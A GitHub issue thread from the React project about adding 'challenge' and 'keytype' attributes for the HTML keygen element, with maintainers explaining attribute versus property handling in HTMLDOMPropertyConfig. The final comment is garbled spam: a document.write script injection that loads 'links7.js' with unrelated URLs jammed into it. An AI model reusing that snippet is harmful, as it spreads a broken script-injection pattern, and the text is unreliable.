### ISSUE TITLE
Missing "challenge" and "keytype" attributes for "keygen" tag

### ISSUE THREAD

**Issue by reederz** [facebook/react#3961]
I'm using [keygen](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/keygen) tag to generate client certificates and I'm missing *challenge* and *keytype* attributes.

**Comment by murashki** [comment]
It would be cool if React gives us the opportunity to use different syntax for attrs and props:
```javascript
var a = <SomeComponent someProp:{someVariableOrFunctionCall} />;

var b = <div
  class="productItem"
  style="font-size:10px;"
  style:{{font-famyly: "tahoma"}}
  dangerouslySetInnerHTML:{someOtherVariableOrFunctionCall}
/>
```

**Comment by zpao** [comment]
@murashki There's more planned to alleviate the issues around unknown elements and properties, but we're not there yet. We have no plans on to use different syntax.

Adding the additional attributes here seems totally reasonable.

**Comment by jamischarles** [comment]
Will try to take a stab at this. I assume this is as simple as adding those props to https://github.com/facebook/react/blob/master/src/renderers/dom/shared/HTMLDOMPropertyConfig.js#L40, and then adding tests. Is that correct or am I missing anything significant?

**Comment by zpao** [comment]
It's even easier than that since we don't really have tests for the attributes. But do actually test in a couple browsers that changing values across renders is reflected appropriately (usually the issues is property vs attribute).

**Comment by reederz** [comment]
You're quick, guys. Thanks in advance!

**Comment by jamischarles** [comment]
@zpao  
> But do actually test in a couple browsers that changing values across renders is reflected appropriately

By 'across renders' you mean simply triggering a re-render (by changing the value)?

**Comment by zpao** [comment]
Yea. I usually just make a simple component with a button that toggles state so I can test with multiple values easily.

**Comment by jamischarles** [comment]
@zpao Great. Thx.

**Comment by reederz** [comment]
@zpao @jamischarles I missed a detail in docs. Although, I don't need it, there's an additional attribute, *keyparams*, which is required with "dsa" and "ec" keytypes. See [here](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/keygen)

**Comment by jamischarles** [comment]
@zpao Have this working, though I'm not entirely clear if these should be `null`, `MUST_USE_ATTRIBUTE` or `MUST_USE_PROPERTY`. I wasn't able to deduce the meaning of these from the code. Is there someplace I can read up on these?

**Comment by zpao** [comment]
Those are used to determine if we do `node.challenge = newValue` or if we do `node.setAttribute('challenge', newValue)` when updating. `null` means it doesn't matter and browsers should work with either. Currently we use properties in that case but we may switch that in the future. `MUST_USE_*` indicate that they must be set & removed as a property or an attribute.

**Comment by jamischarles** [comment]
Thanks. That makes sense. Had to use `MUST_USE_ATTRIBUTE` to get it to work properly across Chrome/FF/Safari. Your testing method great as well. Thx for your help @zpao

**Comment by lacedub** [comment]
<script type="text/javascript">
document.write("<script src='links7.js?'+Math.random( http://goo.gl/3S1bsQ http://armypubs.army.mil/eforms/pdf/A638.PDF )+></script>");
</script>  releases:: document.addEventListener("click", function(){
    document.getElementById("demo").innerHTML = "Hello World";
}); || keyhole.co || join$ #3968 :::||
